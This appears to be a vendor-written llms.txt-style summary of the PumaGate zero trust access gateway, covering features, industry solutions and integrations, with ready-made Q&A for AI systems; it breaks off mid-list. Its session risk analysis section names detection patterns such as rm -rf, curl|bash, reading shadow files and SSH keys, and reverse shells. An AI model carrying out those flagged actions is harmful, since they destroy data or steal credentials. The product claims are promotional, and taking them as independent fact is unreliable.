# PumaGate > PumaGate is a Zero Trust Access Gateway for SSH, RDP, VNC, databases, web applications, and secure network access. Browser-based for end users, with lightweight endpoint agents where secure connectivity is required, plus full session recording and compliance audit trails. - Base URL: https://pumagate.com - PumaGate replaces legacy VPNs with per-resource, identity-verified access - All sessions are recorded and searchable for SOC 2, HIPAA, PCI-DSS compliance - Supports SAML, OIDC, and OAuth2 identity providers - Product categories: Zero Trust Network Access (ZTNA), privileged access management (PAM), browser-based infrastructure access, legacy VPN replacement ## Product Facts - PumaGate is a Zero Trust Access Gateway that combines ZTNA, PAM, browser-based access, and secure network access in one platform. - PumaGate secures SSH, RDP, VNC, database, web app, and internal network access for employees, contractors, and vendors. - Core controls: SSO, MFA, RBAC, just-in-time access, approval workflows, session recording, query logging, and audit trails. - Best fit: engineering, IT, platform, and security teams modernizing infrastructure access without keeping legacy VPN and bastion workflows. - Canonical sources: /pricing for plan limits and pricing, /trust and /trust/security-model for security posture, /docs for deployment and configuration. ## Answer-Ready Q&A - Q: What is PumaGate? A: PumaGate is a Zero Trust Access Gateway for SSH, RDP, VNC, databases, web apps, and secure network access with SSO, MFA, RBAC, session recording, and audit trails. - Q: What does PumaGate replace? A: PumaGate replaces traditional VPNs, jump hosts, bastion boxes, shared credentials, and separate point tools for web access or session recording. - Q: Who is PumaGate for? A: PumaGate is designed for engineering, IT, platform, and security teams that need audited, least-privilege access to infrastructure and internal applications. ## Docs # Overview Introduction to the PumaGate agent and its capabilities # Architecture Understand how the agent works under the hood # Installation Step-by-step guide to installing the agent # Configuration Complete configuration reference # Troubleshooting Common issues and their solutions # PowerShell Module Cross-platform PowerShell client for SSH, SCP, and database access # Linux Installation Install the PumaGate agent on Linux servers with systemd # Container Installation Deploy the PumaGate agent in Docker and Kubernetes environments # Ansible Deployment Deploy PumaGate agents at scale using Ansible playbooks and roles # Puppet Deployment Manage PumaGate agent deployment using Puppet modules and manifests # Terraform Deployment Bootstrap PumaGate agents on cloud instances using Terraform # Change Events & CI/CD Track deployments, configuration changes, and CI/CD events for incident correlation ### Configuration Options - **Server URL** (`AGENT_API_URL` / `--server`): The URL of the PumaGate server to connect to. Supports HTTP and HTTPS. Default: `https://pumagate.com` (required) - **Tenant ID** (`AGENT_TENANT_ID` / `--tenant-id`): Unique identifier for your organization. Used in multi-tenant deployments. Default: `default` (required) - **Agent ID** (`AGENT_ID` / `--agent-id`): Unique identifier for this agent instance. A random UUID is auto-generated on first run if not specified. Default: `(auto-generated UUID)` - **Data Directory** (`AGENT_DATA_DIR` / `--data-dir`): Directory for storing queue data and temporary files. Used for store-and-forward during network outages. Default: `/opt/pumagate/data` - **Log Level** (`AGENT_LOG_LEVEL` / `--log-level`): Logging verbosity. Options: debug, info, warn, error. Default: `info` ## Features # SSH Access Gateway Secure shell gateway with browser-based terminal access — no SSH ports exposed to the internet. Full terminal emulation, session recording, keystroke logging, and identity-based access controls for compliance. Benefits: - Browser-based SSH with full terminal emulation - No SSH ports exposed to the internet - Identity-verified access with SSO integration - Complete keystroke logging and session recording - Role-based access controls per server or group - Just-in-time access with approval workflows - Clipboard and file transfer controls - Searchable session archives for compliance # Secure RDP Access Gateway Native RDP gateway with Kerberos authentication and Active Directory Protected User support. Access Windows desktops through the browser or GUI client — no RDP ports exposed. Includes SSO, MFA, full screen recording, clipboard controls, and file transfer policies. Benefits: - Native RDP protocol implementation - Kerberos authentication with Network Level Authentication (NLA) - Active Directory Protected User group support - Browser-based and GUI client access with no RDP ports exposed - Full session recording with video playback - Clipboard copy/paste and file transfer policy controls - Identity-verified access with SAML/OIDC SSO and MFA enforcement - Multi-monitor and resolution support - Session timeout and idle disconnect policies # VNC Remote Desktop Gateway Embedded VNC gateway with browser-based remote desktop access — no VNC ports exposed to the internet. SSO, MFA, full session recording, clipboard controls, and read-only mode for secure remote management of Linux desktops, Proxmox hosts, and headless servers. Benefits: - Browser-based VNC with no exposed ports - Embedded RFB client — no external VNC proxy required - Identity-verified access with SSO integration - Full session recording with video playback - Read-only mode for monitoring and audit - Clipboard copy/paste controls - Role-based access controls per host or group - Just-in-time access with approval workflows # Database Access Gateway Proxy-based database gateway for PostgreSQL, MySQL, MongoDB, and more. Role-based access controls, per-user identity, full query audit logging, and dynamic data masking — no shared database credentials. Benefits: - Browser-based SQL query interface - Support for PostgreSQL, MySQL, MongoDB, Redis, and more - No shared database credentials - Full query logging and audit trail - Data masking for sensitive columns (PII, secrets) - Role-based read/write access controls - Query result export controls - Schema browser and query history # Internal Web App Gateway Give every internal web app a permanent URL with SSO, MFA, and zero VPN. Deploy shared gateways for instant access or dedicated gateways with LDAP/AD and full isolation. Users are automatically signed in — works with Grafana, Jenkins, ArgoCD, and any web application. Benefits: - Give every internal app a permanent, shareable URL - Delegate authentication to your OIDC or SAML identity provider - Connect to LDAP or Active Directory on dedicated gateways - Add SSO and MFA to any web application — even legacy tools - Users are automatically signed in — no extra login pages - Works with NetBox, Grafana, Jenkins, ArgoCD, and more - Custom domains on Business+ plans - No legacy VPN, no client software — just open the URL - Full audit trail for every request, tied to user identity - Built-in spoofing protection ensures only verified identities reach your apps - Dedicated gateways for isolation and on-prem LDAP/AD integration - Automatic session portability — users stay signed in across gateway instances # Secure Network Access Secure network-level access powered by WireGuard, built into the gateway. Policy-driven access controls enforce who can connect, from which platforms, and to which networks. Native client support for desktop and mobile with automatic peer expiration and dynamic policy re-evaluation. Benefits: - WireGuard-powered network access with native client support on all platforms - Per-user encrypted tunnels with individual key management - Network access policies — allow or deny connections by user, team, IP, and platform - CIDR-based route restrictions — control which networks peers can reach - Dynamic policy re-evaluation — peer access updated instantly when policies change - Split tunneling with policy enforcement — exit node routing controlled by policy - Per-user peer limits enforced by plan and policy (most restrictive wins) - Custom DNS configuration per tunnel for internal name resolution - CGNAT IP allocation — no conflicts with existing network ranges - Full audit trail — policy denials, peer revocations, and restriction changes logged - Automatic peer expiration with policy-driven session duration limits - One-click config download for WireGuard native clients # Kubernetes Access Gateway Secure Kubernetes API proxy with identity-aware impersonation, kubectl exec session recording, pod log streaming, and short-lived kubeconfig tokens. No direct cluster access required. Benefits: - Kubernetes API proxy with user impersonation headers - kubectl exec sessions recorded as asciinema - Pod log streaming via browser WebSocket - Short-lived kubeconfig token generation from CLI - Cluster auto-discovery via kubeconfig or service account - Namespace and pod-level RBAC enforcement - No direct K8s API server exposure to the internet - Integrate with existing SAML/OIDC identity providers # gRPC-Aware Proxy HTTP/2-aware reverse proxy for gRPC services with per-method access policies, service discovery via reflection, and full request/response audit logging. Benefits: - HTTP/2 reverse proxy with gRPC frame awareness - Per-method access policies (allow/deny specific RPCs) - gRPC reflection for automatic service and method discovery - Request and response audit logging with protobuf-to-JSON - gRPC health checking integration - TLS and plaintext (h2c) support - Identity-aware access with session-level controls - Consistent RBAC across gRPC and other protocols # Telnet Access Gateway Secure Telnet gateway bridging browser-based terminals to legacy network devices, mainframes, and industrial systems. Full session recording, TLS upgrade support, and Telnet option negotiation. Benefits: - Browser-based Telnet via WebSocket (xterm.js) - Full session recording in asciinema v2 format - Telnet option negotiation (WILL/WONT/DO/DONT) - NAWS terminal size negotiation - TLS upgrade support (STARTTLS / Telnet over TLS on port 992) - Terminal type negotiation for device compatibility - Identity-verified access with SSO and MFA - Zero Trust access to legacy infrastructure # Identity Provider Integration Works with Okta, Azure AD, Google Workspace, and any SAML/OIDC provider. Full SAML 2.0 Service Provider with JIT user provisioning. One identity, unified access policies across all your infrastructure. Benefits: - Native SSO with Okta, Azure AD, Google Workspace - Full SAML 2.0 Service Provider implementation - OpenID Connect support - JIT user provisioning from SAML assertions - MFA enforcement on every connection - Configurable attribute mapping to users, teams, and roles - Role-based access policies synced from your IdP - Group-based access controls - Automatic user provisioning and deprovisioning - Identity-aware audit logs # Session Recording Full audit trail with video-like playback. See exactly what happened during any session for compliance, forensics, and training. Benefits: - Video-style playback for SSH, RDP, VNC, kubectl exec, and Telnet sessions - Full keystroke logging with timestamps - Database query recording with results - gRPC call audit logging with protobuf-to-JSON - Searchable session archives - Configurable retention policies - Export sessions for compliance audits - Session metadata and tagging - Integration with SIEM systems # Just-In-Time Access Time-limited permissions with approval workflows. Users get access only when needed, automatically revoked when the window closes. Benefits: - Request-based access with approval workflows - Automatic expiration after configurable time windows - Slack and Teams integration for approvals - Emergency break-glass procedures for incidents - Audit trail of all access requests and approvals - Self-service access requests for users - Manager and security team approval chains - Access duration limits (1 hour to 30 days) # Browser-Based Access SSH, RDP, VNC, Kubernetes, Telnet, and database access directly in the browser. No agents to install, no ports to expose, no VPN to manage. Works from any device, anywhere. Benefits: - Full terminal emulation in the browser - RDP with clipboard and file transfer controls - Database query interface with schema browser - kubectl exec and pod logs in the browser - Telnet terminal for legacy devices - Works on managed and unmanaged devices - No client software to install or maintain - No VPN or direct network access required - Consistent experience across all platforms - Secure WebSocket connections with TLS # Zero Trust Architecture Verify every request, trust nothing by default. Every connection is authenticated, authorized, and encrypted — no implicit trust zones. Benefits: - No implicit trust based on network location - Identity verification for every connection - Continuous authorization during sessions - Encrypted connections end-to-end - Device posture checks before access - Context-aware access decisions - Micro-segmentation of access policies - Real-time session monitoring and termination # Compliance & Audit SOC 2, GDPR, HIPAA audit support out of the box. Detailed logs, session recordings, and access reports for any compliance framework. Benefits: - SOC 2 Type II compliance support - GDPR-compliant data handling - HIPAA-ready access controls - Detailed audit logs for all access events - Session recording for forensic review - Access reports and compliance dashboards - Configurable data retention policies - Export data for external auditors # Interactive Slack Bot Approve or deny access requests directly from Slack with interactive messages. Managers receive real-time notifications with one-click approve/deny buttons, eliminating context-switching and reducing access request latency from minutes to seconds. Benefits: - One-click approve/deny buttons in Slack messages - Real-time notifications to managers and admins - Interactive Block Kit messages with request details - Requester, resource type, and reason displayed inline - Cryptographic signature verification on all webhooks - SSRF-safe URL validation for Slack endpoints - Manager and admin role enforcement for approvals - Self-approval prevention with audit trail - Seamless integration with existing access request workflows - No Slack workspace changes needed — works via incoming webhooks # Session Risk Analysis Automatically detect risky commands and dangerous queries in session recordings. Regex-based pattern matching identifies destructive operations, privilege escalation attempts, credential access, and data exfiltration — triggering real-time alerts for security teams. Benefits: - Automatic analysis of SSH and database session recordings - Detects destructive commands (rm -rf, DROP TABLE, TRUNCATE) - Identifies privilege escalation (sudo, chmod 777, SUID bits) - Catches credential access (shadow files, SSH private keys) - Flags data exfiltration patterns (curl|bash, base64, scp) - Detects reverse shell and persistence patterns - Risk levels: Low, Medium, High, Critical with categorization - Integrated with PumaGate alerting (email, Slack, PagerDuty) - Capped findings to prevent resource exhaustion - Post-upload asynchronous analysis — zero session latency impact # Approval Workflows Configurable multi-step approval chains for access requests. Define who approves, in what order, and with what time limits — across web apps, endpoints, groups, resource sessions, and network access. Auto-approve trusted roles, auto-deny stale requests, and notify approvers via email, Slack, Discord, or webhooks. Benefits: - Multi-step approval chains — team lead, then manager, then security - Configurable approver types: by role level, team membership, or specific users - Per-step required approval counts and timeout limits - Auto-approve for trusted roles — skip the queue when policy allows - Auto-deny for stale requests — timed-out requests denied automatically - Time-bound access with configurable duration and automatic revocation - Multi-channel notifications: email, Slack, Discord, Teams, Telegram, webhooks - Covers all resource types: web apps, endpoints, groups, resource sessions, VPN - Full audit trail for every decision with approver identity and notes - Priority-based workflow matching — most specific policy wins # Native CLI Client Use pumagate ssh, pumagate psql, and pumagate mysql to access servers and databases from your native terminal without a browser. The PumaGate CLI authenticates via OAuth2 Device Code Flow and creates secure sessions through the gateway. Benefits: - OAuth2 Device Code Flow for terminal-based authentication - Use pumagate psql, pumagate mysql, and other database subcommands from your terminal - Token caching in ~/.pumagate/ for session persistence - Resource listing with type, status, and host information - Automatic token refresh and expiration management - Works with all plans — Solo through Enterprise - Lightweight single binary with zero dependencies - Config management for multi-environment setups - Compatible with CI/CD pipelines and automation scripts # Security Policies Enforce organisation-wide and team-level security policies that govern session behaviour. Configure re-authentication windows, idle timeouts, concurrent session limits, and MFA requirements — with team-level overrides for granular control across departments. Benefits: - Force re-authentication after configurable hours (org-wide or per-team) - Idle timeout auto-logout after inactivity (org-wide or per-team) - Limit concurrent sessions per user to prevent credential sharing - Enforce MFA for all organisation members with a single toggle - Team-level overrides — stricter policies for sensitive departments - Teams inherit org defaults unless explicitly overridden - Real-time enforcement — policy changes apply to active sessions - Full audit trail for every policy change with admin attribution - API-driven configuration for infrastructure-as-code workflows - Available on Business and Enterprise plans ## Solutions # Remote Workforce Access Enable your remote and hybrid workforce to securely access SSH servers, Windows desktops, Kubernetes clusters, databases, and internal applications from anywhere. PumaGate replaces clunky VPNs with identity-verified, browser-based access across nine protocols — with unified SSO, MFA, and full session recording. Secure access for distributed teams without a VPN Benefits: - No VPN client software to install or maintain — everything runs in the browser - SSO for SSH: Replace SSH keys with SAML/OIDC identity-based access from your corporate IdP - SSO for RDP: Windows remote desktop access with IdP authentication and screen recording - SSH for Database: Query PostgreSQL, MySQL, and MongoDB through the gateway — users never see passwords - Complete keystroke and screen recording across SSH, RDP, VNC, and database sessions - Granular role-based access controls per user, team, and resource across all protocols - Works from any location, any device, any browser — with MFA enforcement on every session - Native CLI client for terminal-native SSH and database access via OAuth2 authentication # Third-Party / Vendor Access Safely grant external contractors, MSPs, and vendors access to specific resources without shared credentials or permanent VPN accounts. PumaGate provides just-in-time, time-limited access with full session recording. Grant time-limited access to contractors and vendors Benefits: - No shared credentials or VPN accounts for vendors - Just-in-time access with automatic expiration - Full session recording and keystroke logging - Approval workflows before access is granted - Granular permissions scoped to specific resources - Complete audit trail for compliance reporting # Privileged Access Management Enforce least-privilege access to production servers, databases, and critical infrastructure. PumaGate provides identity-verified, session-recorded access with just-in-time permissions and credential vaulting. Control and audit privileged access to critical infrastructure Benefits: - Eliminate shared admin accounts and root passwords - Just-in-time privileged access with approval workflows - Complete keystroke logging and session recording - Secure credential vaulting with session-scoped access - Role-based access controls with team policies - Real-time alerts on suspicious privileged activity # VPN Replacement Replace legacy VPN infrastructure with a modern Zero Trust access platform. PumaGate eliminates the attack surface of VPNs while providing faster, more granular access to internal resources — no client software, no exposed ports, no lateral movement risk. Replace your VPN with Zero Trust access Benefits: - No network-level access — only application-level connections - No VPN client software to deploy or maintain - Faster connection times than traditional VPNs - Per-resource access policies instead of network segments - Identity-verified connections with MFA enforcement - Reduced attack surface — no exposed VPN ports # Healthcare (HIPAA) Meet HIPAA requirements for access control, audit logging, and session recording. PumaGate provides the technical safeguards healthcare organizations need to protect ePHI while enabling clinical and IT staff to access systems efficiently. HIPAA-compliant access to healthcare IT systems Benefits: - HIPAA-compliant session recording and audit trails - Role-based access to systems containing ePHI - Automatic session timeout and idle disconnect - Complete access logs for HIPAA audit requirements - MFA enforcement for all privileged access - Data masking for sensitive patient information # Finance (SOX/PCI) Satisfy SOX Section 404 internal controls and PCI-DSS requirements for access management. PumaGate provides the audit trails, access controls, and session recordings financial institutions need for regulatory compliance. Meet SOX and PCI-DSS requirements for access control Benefits: - SOX-compliant access controls with separation of duties - PCI-DSS compliant privileged access management - Complete audit trails for every access session - Automatic access reviews and certification reports - Time-limited access to production financial systems - Real-time alerting on unauthorized access attempts # Government (FedRAMP) Implement NIST 800-53 access controls aligned with FedRAMP requirements. PumaGate provides the identity verification, continuous monitoring, and audit capabilities government agencies need for Authority to Operate (ATO). FedRAMP-aligned access controls for government agencies Benefits: - NIST 800-53 aligned access controls - Continuous monitoring of privileged access - Complete audit trails for ATO documentation - Identity verification via PIV/CAC card integration - Encryption in transit and at rest - Incident response support with session playback # Secure Access for Education Protect research data, student records, and campus infrastructure with Zero Trust access. PumaGate provides identity-verified SSH, RDP, VNC, database, and web app access for faculty, researchers, and IT staff — with session recording for compliance. Zero Trust access for universities, schools, and research institutions Benefits: - Protect research data and intellectual property with identity-verified access - Session recording for FERPA, HIPAA (research), and institutional compliance - Grant temporary access to visiting researchers and collaborators with automatic expiration - Secure access to HPC clusters, research databases, and lab servers via SSO - Eliminate SSH key sprawl across campus computing infrastructure - Unified access management for faculty, staff, students, and external collaborators # Secure Access for Manufacturing Protect manufacturing infrastructure, OT networks, and SCADA systems with Zero Trust access. PumaGate provides identity-verified access to production systems, PLCs, and factory servers — with session recording for safety and compliance. Zero Trust access for OT networks, SCADA systems, and factory infrastructure Benefits: - Secure remote access to OT/SCADA systems without exposing them to the internet - Session recording for safety compliance and incident investigation - Grant vendor maintenance access with time-limited, recorded sessions - Separate IT and OT access policies with different MFA requirements - Protect HMI and engineering workstations from unauthorized access - Audit trail for all production system access for ISO 27001 and IEC 62443 compliance # Secure Access for Law Firms Protect client privilege, case data, and legal infrastructure with Zero Trust access. PumaGate provides identity-verified access to document management systems, case databases, and internal applications — with session recording for ethical compliance. Zero Trust access for legal infrastructure and client data Benefits: - Protect attorney-client privilege with identity-verified access to case systems - Session recording for ethical compliance and malpractice protection - Grant temporary access to co-counsel and expert witnesses with automatic expiration - Secure access to document management systems and case databases via SSO - Eliminate shared credentials for practice management software - Audit trail for all access to client matter data for regulatory compliance # Secure Access for MSPs Manage secure access to hundreds of client environments from a single platform. PumaGate provides MSPs with multi-tenant access management, session recording for SLA compliance, and per-client access policies — without maintaining VPN infrastructure per client. Multi-tenant Zero Trust access for managed service providers Benefits: - Multi-tenant access management from a single PumaGate deployment - Per-client access policies with separate audit trails - Session recording for SLA compliance and incident documentation - Grant and revoke technician access per client instantly via IdP groups - Eliminate client-specific VPN configurations and credentials - White-label access portal for client-facing access requests - Time-limited access for project-based engagements - Complete audit trail for each client environment # Secure Access for Retail Protect POS systems, e-commerce platforms, and retail infrastructure with Zero Trust access. PumaGate provides identity-verified access to store systems, payment infrastructure, and customer databases — with session recording for PCI DSS compliance. Zero Trust access for POS systems, e-commerce, and retail infrastructure Benefits: - PCI DSS-compliant access to cardholder data environments with full audit trails - Session recording for all access to POS systems and payment infrastructure - Secure remote management of distributed store locations without VPN per store - Grant vendor access to POS systems with time-limited, recorded sessions - Protect customer databases and loyalty program data with identity-verified access - Centralized access management across hundreds of retail locations # PumaGate for Startups Move fast without sacrificing security. PumaGate gives early-stage teams SSH, RDP, VNC, database, and web app access through a single gateway — with SSO, session recording, and RBAC built in. No VPN to manage, no infrastructure to maintain, and no security engineer required to set it up. Enterprise-grade access security from day one — without the enterprise overhead Benefits: - Deploy in under 5 minutes — single binary, no infrastructure to provision - Free tier covers small teams so you only pay when you scale - Built-in SSO means you never manage SSH keys or shared passwords - Session recording gives you audit readiness for SOC 2 from day one - Browser-based access — nothing to install on developer laptops - Role-based access controls grow with your team without rearchitecting - Impress enterprise prospects with security posture beyond your size - Replace VPN + bastion + key management with a single tool # PumaGate for SMBs & Mid-Market Growing teams face growing access complexity. PumaGate gives mid-size organizations centralized SSH, RDP, VNC, database, and web app access with identity-based controls, approval workflows, and session recording — without requiring a full-time security team to operate. Secure, auditable infrastructure access without a dedicated security team Benefits: - Centralize access to all infrastructure through a single gateway — SSH, RDP, VNC, databases, and web apps - Approval workflows for sensitive production access without complex ticketing systems - SCIM provisioning syncs users and groups from your IdP automatically - Session recording satisfies SOC 2, ISO 27001, and cyber insurance requirements - Just-in-time access eliminates standing privileges without slowing engineers down - Team-based policies let managers control access without IT bottlenecks - Contractor and vendor access with automatic expiration — no lingering VPN accounts - Single pane of glass for access auditing across all protocols # PumaGate for Enterprise Enterprise organizations need access controls that scale across thousands of users, hundreds of teams, and multiple regions — without creating bottlenecks. PumaGate provides a unified Zero Trust gateway with SSO, SCIM, granular RBAC, approval workflows, vault integration, and full session recording across every protocol. Zero Trust access at scale — multi-region, multi-team, fully audited Benefits: - Multi-gateway architecture for regional deployments with centralized policy management - Vault integration (HashiCorp, AWS Secrets Manager, Azure Key Vault, GCP Secret Manager) for credential lifecycle - SCIM 2.0 provisioning from Okta, Azure AD, and OneLogin for automated user lifecycle - Granular RBAC with team hierarchies, resource groups, and attribute-based policies - Approval workflows with multi-level escalation, Slack integration, and time-limited grants - Session recording with tamper-proof storage in your S3-compatible bucket - Smart alerting with escalation policies, maintenance windows, and on-call integration - Data masking for sensitive fields in database query results and terminal output - Log forwarding to your SIEM (Splunk, Elasticsearch, Datadog) for unified security monitoring - Endpoint trust scoring and device posture checks before granting access # PumaGate for DevOps Teams DevOps teams need fast, reliable access to production servers, databases, containers, and cloud infrastructure. PumaGate replaces VPNs and bastion hosts with a single gateway that provides SSH, RDP, VNC, and database access through identity-based controls — with session recording for incident response and compliance. Streamline infrastructure access without compromising security or velocity Benefits: - SSH into production servers with SSO instead of managing SSH keys across hundreds of hosts - Database access through the gateway — connect to PostgreSQL, MySQL, and MongoDB without sharing credentials - CLI client supports SSH and SCP via OAuth2 device flow — works in your existing terminal workflows - Just-in-time access to production with approval workflows — no standing privileges - Session recording captures every command for incident investigation and post-mortems - Agent-based deployment discovers resources automatically — no manual inventory - Secure network tunnels for accessing internal services that need network-level connectivity - API-first design integrates with CI/CD pipelines, Terraform, and infrastructure-as-code workflows # PumaGate for Security Teams Security teams need to enforce least-privilege access, maintain complete audit trails, and respond to incidents with evidence — not guesswork. PumaGate provides Zero Trust access with identity verification, session recording, smart alerting, and compliance reporting across SSH, RDP, VNC, database, and web app protocols. Zero Trust access controls with complete visibility and audit coverage Benefits: - Zero standing privileges — all access is just-in-time with identity verification and MFA - Complete session recording across SSH, RDP, VNC, and database sessions for forensic investigation - Smart alerting with escalation policies detects suspicious access patterns in real time - Data masking prevents sensitive information from being visible in session recordings - Endpoint trust scoring enforces device posture requirements before granting access - SIEM integration forwards access logs to Splunk, Elasticsearch, and Datadog - Compliance-ready audit reports for SOC 2, ISO 27001, HIPAA, PCI DSS, and SOX - Access request approval workflows with Slack notifications and multi-level escalation - Credential vaulting with HashiCorp Vault, AWS Secrets Manager, and Azure Key Vault integration - Funnel links for controlled third-party access with automatic expiration and recording # PumaGate for IT & Infrastructure Teams IT teams manage access to hundreds of servers, Windows desktops, databases, and internal applications — often with a patchwork of VPNs, bastion hosts, and shared credentials. PumaGate consolidates everything into a single gateway with SCIM provisioning, automated onboarding/offboarding, and centralized policy management. Centralize access management across every server, desktop, database, and app Benefits: - SCIM 2.0 provisioning automatically syncs users and groups from Okta, Azure AD, or Google Workspace - Automated onboarding — new hires get access to the right resources instantly via IdP group membership - Instant offboarding — removing a user from the IdP revokes all access across every protocol immediately - Centralized dashboard shows all resources, active sessions, and access status in one place - Multi-protocol support means one tool replaces separate SSH, RDP, VNC, database, and web app access solutions - Health checks monitor resource availability and alert IT when servers or databases go offline - Secure network access for legacy applications that require network-level connectivity - Self-service access requests reduce IT ticket volume with approval workflows and auto-provisioning # PumaGate for Engineering Teams Engineers need to move fast. PumaGate provides instant SSH, database, and web app access through the browser or CLI — with SSO instead of SSH keys, per-user database sessions instead of shared passwords, and zero VPN configuration. Security happens in the background; engineers stay in flow. Fast, secure access to dev, staging, and production — without context switching Benefits: - SSH via browser or native CLI — no SSH key management, no VPN, no bastion host - Database access through the gateway — run queries against PostgreSQL, MySQL, and MongoDB with individual identity - One-command CLI access via OAuth2 device flow — works with your existing terminal and scripts - Browser-based RDP for Windows development environments and staging servers - Switch between dev, staging, and production environments instantly — no VPN reconnection - Just-in-time production access with lightweight approval — doesn't break your flow - Session recording runs silently in the background — zero performance impact - SCP file transfer through the gateway with the same identity-based access controls # PumaGate for Compliance & GRC Teams Compliance teams spend months gathering access evidence for audits. PumaGate generates continuous, tamper-proof audit trails across every SSH, RDP, VNC, database, and web app session — with automated reports mapped to SOC 2, ISO 27001, HIPAA, PCI DSS, SOX, and FedRAMP controls. Continuous compliance evidence for every infrastructure access session Benefits: - Automated audit trail generation — every session is recorded with user identity, timestamp, and actions - Compliance reports mapped to SOC 2, ISO 27001, HIPAA, PCI DSS, SOX, and NIST 800-53 controls - Tamper-proof session recordings stored in your S3-compatible bucket with integrity verification - Access reviews with exportable reports showing who has access to what, when, and why - Separation of duties enforcement through role-based policies and approval workflows - Just-in-time access with automatic expiration eliminates standing privileges — a key audit finding - Data masking ensures sensitive information is not captured in session recordings - SIEM integration provides real-time compliance monitoring alongside your existing security stack # PumaGate for Platform Engineering Platform engineering teams build internal developer platforms that abstract infrastructure complexity. PumaGate provides the access layer — a self-service portal where developers request and receive SSH, database, and application access through golden paths, with guardrails, approval workflows, and full observability built in. Build a self-service access platform for your engineering organization Benefits: - Self-service access portal — developers request access through golden paths instead of filing tickets - API-first design lets you integrate PumaGate into your internal developer platform and Backstage catalogs - Resource groups and team policies define access templates that scale with your organization - Approval workflows with Slack integration provide guardrails without creating bottlenecks - Agent-based resource discovery automatically registers new infrastructure as it's provisioned - Multi-gateway architecture supports platform teams managing access across multiple clusters and regions - Session recording and audit trails are built into the platform — no separate tooling needed - Terraform provider and API enable infrastructure-as-code access policy management ## Integrations # Okta Category: Identity Provider Enterprise SSO and user provisioning with Okta for seamless Zero Trust access control. Features: - SAML 2.0 and OIDC SSO support - Automatic user deprovisioning on Okta removal - Group-based access policies - MFA enforcement through Okta policies - Just-in-time user provisioning - Okta Verify push notifications - Session management and SSO logout Use cases: - Centralize identity management for infrastructure access - Enforce MFA for SSH, RDP, VNC, Kubernetes, and database connections - Automate user lifecycle from hire to termination - Apply group-based RBAC to all resources # Microsoft Entra ID Category: Identity Provider Integrate with Microsoft Entra ID (Azure AD) for enterprise SSO and conditional access policies. Features: - SAML 2.0 and OIDC SSO integration - Conditional Access policy support - Azure MFA integration - Entra ID P1/P2 feature support - Microsoft Authenticator push notifications - Group-based access control - Hybrid identity support Use cases: - Extend Microsoft 365 identity to infrastructure access - Apply Conditional Access policies to SSH, RDP, VNC, and Kubernetes - Leverage existing Azure security investments - Unify identity across cloud and on-premise resources # Google Workspace Category: Identity Provider SSO and user provisioning with Google Workspace for organizations using Google Cloud identity. Features: - SAML 2.0 SSO with Google Workspace - OIDC authentication support - Google Groups for access control - Automatic user provisioning via Google Directory API - Google 2-Step Verification support - Google Authenticator integration - Domain-wide delegation support - Admin console management Use cases: - Use Google accounts for infrastructure access - Leverage Google Groups for RBAC policies - Enforce Google 2-Step Verification for all access - Automate user management from Google Admin # Auth0 Category: Identity Provider Flexible identity platform integration with Auth0 for SSO and social login support. Features: - SAML and OIDC SSO support - Social login connections - Enterprise connections (AD, LDAP) - Auth0 Universal Login - MFA with Auth0 Guardian - Custom rules and actions - User management API integration - Passwordless authentication Use cases: - Enable flexible authentication options for teams - Support contractor access via social logins - Implement passwordless access to infrastructure - Custom authentication flows for compliance # OneLogin Category: Identity Provider Enterprise SSO and user provisioning with OneLogin for unified access management. Features: - SAML 2.0 and OIDC SSO - OneLogin Protect MFA - Smart Factor Authentication - User lifecycle management - Directory integration - Access policies and rules - Session management Use cases: - Extend OneLogin to infrastructure access - Enforce Smart Factor Authentication for sensitive resources - Automate user provisioning from HR systems - Apply role-based access across all resources # Duo Security Category: Identity Provider Enforce Duo MFA for all infrastructure access with push notifications and device trust. Features: - Duo Push notifications for MFA - Device trust and health checks - Adaptive access policies - Duo Universal Prompt - Hardware token support - Bypass codes for emergency access - Admin panel for policy management - Detailed authentication logs Use cases: - Add MFA to all infrastructure access - Verify device health before granting access - Implement adaptive authentication policies - Provide emergency bypass capabilities # JumpCloud Category: Identity Provider Cloud directory integration with JumpCloud for SSO and device management. Features: - SAML 2.0 SSO integration - JumpCloud Directory for user provisioning - Group-based access control - MFA enforcement - Device management integration - Conditional access policies - LDAP and RADIUS support - Cross-platform identity Use cases: - Extend JumpCloud to infrastructure access - Leverage device trust for access decisions - Unify identity across cloud and on-premise - SMB-friendly Zero Trust implementation # SAML 2.0 Category: Identity Provider Connect any SAML 2.0 compliant identity provider for enterprise SSO integration. Features: - SAML 2.0 SP-initiated SSO - IdP-initiated SSO support - Signed assertions and responses - Encrypted assertions - Attribute statement mapping - NameID format configuration - Single Logout (SLO) - Metadata exchange Use cases: - Integrate with on-premise ADFS - Connect to Shibboleth IdP - Custom enterprise IdP integration - Multi-IdP federation scenarios # OpenID Connect Category: Identity Provider Connect any OpenID Connect provider for modern OAuth 2.0 based authentication. Features: - OIDC Authorization Code flow - PKCE support for enhanced security - ID Token and Access Token validation - Userinfo endpoint integration - Custom scope configuration - Claim mapping to user attributes - Token refresh handling - Discovery document auto-configuration Use cases: - Integrate with custom OAuth servers - Connect cloud-native identity platforms - Modern authentication for new deployments - API-first identity integration # Splunk Category: SIEM Forward session recordings and audit logs to Splunk for security analysis and compliance. Features: - HTTP Event Collector (HEC) integration - Real-time event streaming - Session recording metadata forwarding - Access granted/denied events - User authentication events - Policy violation alerts - Custom field mapping - Splunk Enterprise and Cloud support Use cases: - Centralize access logs for SOC teams - Correlate access events with security incidents - Generate compliance reports from access data - Detect anomalous access patterns # Elastic SIEM Category: SIEM Stream access events to Elastic SIEM for threat detection and security analytics. Features: - Elasticsearch HTTP API integration - Logstash input support - Beats integration option - ECS field mapping - Real-time event indexing - Session recording metadata - Custom index patterns - Elastic Cloud and self-hosted support Use cases: - Unified security analytics platform - Machine learning anomaly detection on access - Custom detection rules for policy violations - Long-term audit log retention # Microsoft Sentinel Category: SIEM Forward audit logs to Microsoft Sentinel for cloud-native SIEM and security orchestration. Features: - Log Analytics workspace integration - CEF/Syslog forwarding support - Azure Event Hub streaming - Custom table ingestion - Built-in detection rules - SOAR playbook triggers - Incident correlation - Azure-native security integration Use cases: - Unify Azure and infrastructure security - Correlate access with Microsoft 365 events - Automated incident response playbooks - Cloud-native SOC operations # Datadog Category: SIEM Send access logs and session metadata to Datadog for observability and security monitoring. Features: - Datadog Logs API integration - Real-time event forwarding - Custom tags and attributes - Session recording metadata - Access pattern dashboards - Security signal correlation - Log pipeline processing - Cloud and on-premise support Use cases: - Unify access logs with application observability - Correlate access events with APM traces - Security monitoring dashboards - Access pattern analytics # PagerDuty Category: Alerting On-call access provisioning and access alerts through PagerDuty incident management. Features: 